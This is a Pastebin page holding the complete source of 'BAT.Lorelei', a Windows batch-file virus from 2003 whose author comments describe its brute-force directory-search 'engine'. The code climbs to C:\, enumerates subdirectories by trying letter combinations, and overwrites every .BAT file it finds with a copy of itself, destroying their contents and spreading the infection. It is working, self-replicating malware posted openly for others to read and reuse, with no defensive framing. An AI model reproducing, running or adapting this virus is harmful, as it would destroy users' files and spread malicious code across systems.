API tools faq
paste
Advertisement
FlyFar

Virus.BAT.Lorelei - Source Code

FlyFar
Jul 3rd, 2023
884
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 4.52 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. :: BAT.Lorelei
  2. ::  by Second Part To Hell[rRlf]
  3. ::  www.spth.de.vu
  4. ::  spth@aonmail.at
  5. ::  written on 25.07.2003
  6. ::  in Austria
  7. ::
  8. ::  In my opinion, this is no real virus, but a new, never seen engine.
  9. ::  It searches in the next 3 directories for bat files. It searches the directory names
  10. ::  in a brute-force way. That's also the reason, why it needs very long to run (about 45sec
  11. ::  at my 1.400MHz). Now let me show you, what I mean:
  12. ::  ---
  13. ::  C:\asterix\obelix\idefix\roma
  14. ::            \zzz
  15. ::    \windows\system\...
  16. ::    \programs
  17. ::  ---
  18. ::  It will infect every .BAT file in the directories (C:\*.* | C:\asterix\*.* | C:\asterix\obelix\*.* |
  19. ::  C:\asterix\obelix\idefix\*.*). The engine isn't perfect now, but I don't want to work on it anymore.
  20. ::  But a perfect version of that would be the same as the command 'for /r C: ...' in Win00|XP|NT.
  21. ::  Unfortunately, I had no time to test it at Win 9x, but at WinXP it works fine, so I guess, it should also
  22. ::  work on Win9x, because I didn't use any special commands.
  23. ::  One other thing is the 'goto %BackJmpLable%'. You are able to do cool things with that. And you're also
  24. ::  able to short your codes a lot.
  25. ::
  26. ::  OK, I think, that's everything. I wish you fun while you are trying to understand this :)
  27. ::
  28. ::
  29. :: --------------------------------------< BAT.Lorelei >--------------------------------------
  30. cls
  31. @echo off
  32. set saveA=Lorelei
  33. set saveB=Lorelei
  34. set saveC=Lorelei
  35. set buffer=Loro
  36. :Again
  37. set counter=%counter%!
  38. if %counter%==!!! exit
  39. set count=Lorelei
  40. set StageA=StageA
  41. set StageB=StageB
  42. set StageC=StageC
  43. set exspth=exspth
  44. :GetRoot
  45. cd..
  46. set GRcheck=%GRcheck%x
  47. if %GRcheck%==xxxxxxxx goto GotRoot
  48. goto GetRoot
  49. :GotRoot
  50. set GRcheck=
  51. C:
  52. set spth=C:\
  53. set Oldspth=%spth%
  54. set BackJmpLable=DirCheck
  55. goto infect
  56.  
  57. :DirCheck
  58. dir %spth%* >C:\Lorelei
  59. find "<DIR>" C:\Lorelei>trash
  60. set ThOfTr=a
  61. if %spth%==%exspth% set ThOfTr=gothic
  62. if NOT ERRORLEVEL 1 set BackJmpLable=SetDirCheck
  63. if NOT ERRORLEVEL 1 set Oldspth=%spth%
  64. if NOT ERRORLEVEL 1 goto AddNewLetter
  65. set spth=%Oldspth%
  66. goto DirCheck
  67.  
  68. :SetDirCheck
  69. cd %spth%>trash
  70. if NOT ERRORLEVEL 1 set BackJmpLable=SDCfinish
  71. if NOT ERRORLEVEL 1 goto infect
  72. goto DirCheck
  73.  
  74. :SDCfinish
  75. if %spth%==%saveA% set ThOfTr=e
  76. if %spth%==%saveB% set ThOfTr=e
  77. if %spth%==%saveC% set ThOfTr=e
  78. if %ThOfTr%==e set spth=%Oldspth%
  79. if %ThOfTr%==e goto DirCheck
  80. set SDCvar=SDCvar
  81. if NOT %StageA%==Lorelei set SDCvar=1
  82. if %SDCvar%==1 set StageA=Lorelei
  83. if %SDCvar%==1 goto Savevar
  84. if NOT %StageB%==Lorelei set SDCvar=2
  85. if %SDCvar%==2 set StageB=Lorelei
  86. if %SDCvar%==2 goto Savevar
  87. if NOT %StageC%==Lorelei set SDCvar=3
  88. if %SDCvar%==3 set StageC=Lorelei
  89. if %SDCvar%==3 goto SaveVar
  90. exit
  91.  
  92.  
  93. :AddNewLetter
  94. set ThOfTr=a
  95. set AddNewLetterVar=%AddNewLetterVar%y
  96. if %AddNewLetterVar%==y if %exspth%==%spth% if %count%==! goto Again
  97. if %AddNewLetterVar%==y if %exspth%==%spth% set count=!
  98. if %AddNewLetterVar%==y set exspth=%spth%
  99. if %AddNewLetterVar%==y set spth=%spth%a
  100. if %AddNewLetterVar%==yy set spth=%spth%b
  101. if %AddNewLetterVar%==yyy set spth=%spth%c
  102. if %AddNewLetterVar%==yyyy set spth=%spth%d
  103. if %AddNewLetterVar%==yyyyy set spth=%spth%e
  104. if %AddNewLetterVar%==yyyyyy set spth=%spth%f
  105. if %AddNewLetterVar%==yyyyyyy set spth=%spth%g
  106. if %AddNewLetterVar%==yyyyyyyy set spth=%spth%h
  107. if %AddNewLetterVar%==yyyyyyyyy set spth=%spth%i
  108. if %AddNewLetterVar%==yyyyyyyyyy set spth=%spth%j
  109. if %AddNewLetterVar%==yyyyyyyyyyy set spth=%spth%k
  110. if %AddNewLetterVar%==yyyyyyyyyyyy set spth=%spth%l
  111. if %AddNewLetterVar%==yyyyyyyyyyyyy set spth=%spth%m
  112. if %AddNewLetterVar%==yyyyyyyyyyyyyy set spth=%spth%n
  113. if %AddNewLetterVar%==yyyyyyyyyyyyyyy set spth=%spth%o
  114. if %AddNewLetterVar%==yyyyyyyyyyyyyyyy set spth=%spth%p
  115. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyy set spth=%spth%q
  116. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyy set spth=%spth%r
  117. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyy set spth=%spth%s
  118. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyy set spth=%spth%t
  119. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyy set spth=%spth%u
  120. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyy set spth=%spth%v
  121. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyyy set spth=%spth%w
  122. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyyyy set spth=%spth%x
  123. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyyyyy set spth=%spth%y
  124. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyyyyyy set spth=%spth%z
  125. if %AddNewLetterVar%==yyyyyyyyyyyyyyyyyyyyyyyyyy set AddNewLetterVar=
  126. goto %BackJmpLable%
  127.  
  128. :SaveVar
  129. set spth=%spth%\
  130. goto DirCheck
  131.  
  132.  
  133. :infect
  134. for %%a in (*.bat) do copy %0 %%a
  135. goto %BackJmpLable%
Tags: batch virus SPTH
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!